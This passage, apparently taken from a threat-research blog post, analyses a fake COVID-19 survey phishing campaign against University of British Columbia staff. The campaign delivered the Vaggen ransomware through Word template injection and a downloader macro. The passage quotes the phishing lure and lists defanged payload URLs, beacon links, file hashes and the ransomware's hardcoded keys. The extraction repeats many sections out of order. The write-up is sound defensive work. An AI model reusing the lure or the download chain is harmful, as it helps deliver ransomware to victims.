services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3257 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3258 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3259 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3260 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3261 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3262 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3263 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3264 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3265 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3266 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3267 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3268 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3269 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3270 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3271 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3272 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3273 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3274 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3275 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3276 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3277 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3278 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3279 of 3467\n\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3280 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3281 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3282 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3283 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3284 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3285 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3286 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM 